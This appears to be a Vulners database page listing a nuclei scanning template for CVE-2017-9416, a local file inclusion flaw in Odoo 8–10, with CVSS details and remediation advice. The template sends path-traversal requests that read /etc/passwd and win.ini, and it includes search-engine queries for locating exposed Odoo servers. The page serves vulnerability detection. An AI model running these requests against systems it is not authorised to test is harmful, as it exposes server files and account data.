Lucene search
K

Odoo 8.0/9.0/10.0 - Local File Inclusion

🗓️ 03 Jun 2026 06:04:49Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 130 Views

Odoo 8.0/9.0/10.0 Local File Inclusion vulnerability allows reading arbitrary files

Related
Refs
Code
ReporterTitlePublishedViews
Family
CNVD
Odoo Directory Traversal Vulnerability
8 Jun 201700:00
cnvd
CVE
CVE-2017-9416
3 Jun 201723:00
cve
Cvelist
CVE-2017-9416
3 Jun 201723:00
cvelist
Debian CVE
CVE-2017-9416
3 Jun 201723:00
debiancve
NVD
CVE-2017-9416
4 Jun 201721:29
nvd
OpenVAS
Generic HTTP Directory Traversal / File Inclusion (Web Dirs) - Active Check
22 Jul 202100:00
openvas
Prion
Directory traversal
4 Jun 201721:29
prion
id: CVE-2017-9416

info:
  name: Odoo 8.0/9.0/10.0 - Local File Inclusion
  author: Co5mos
  severity: medium
  description: |
    Odoo 8.0, 9.0, and 10.0 are susceptible to local file inclusion via tools.file_open. An attacker can potentially obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
  impact: |
    Allows an attacker to read arbitrary files on the server.
  remediation: |
    Upgrade to a patched version of Odoo or apply the necessary security patches.
  reference:
    - https://github.com/odoo/odoo/issues/17394
    - https://nvd.nist.gov/vuln/detail/CVE-2017-9416
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 6.5
    cve-id: CVE-2017-9416
    cwe-id: CWE-22
    epss-score: 0.16345
    epss-percentile: 0.94975
    cpe: cpe:2.3:a:odoo:odoo:8.0:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: odoo
    product: odoo
    shodan-query:
      - cpe:"cpe:2.3:a:odoo:odoo"
      - http.title:"odoo"
    fofa-query: title="odoo"
    google-query: intitle:"odoo"
  tags: cve2017,cve,odoo,lfi,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/base_import/static/c:/windows/win.ini"
      - "{{BaseURL}}/base_import/static/etc/passwd"

    stop-at-first-match: true

    matchers-condition: or
    matchers:
      - type: dsl
        dsl:
          - "regex('root:.*:0:0:', body)"
          - "status_code == 200"
        condition: and

      - type: dsl
        dsl:
          - "contains(body, 'bit app support')"
          - "contains(body, 'fonts')"
          - "contains(body, 'extensions')"
          - "status_code == 200"
        condition: and
# digest: 4b0a00483046022100992429cf310db397ef7e22a29e3a750e7ac93e85191c5f6b8ae60428c6b30677022100dfad4ddbc2c872daf4e607158d70fc632dd11eed5df860e1f25d7be7bc37cdd2:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
6.8Medium risk
Vulners AI Score6.8
CVSS 24
CVSS 36.5
EPSS0.16345
130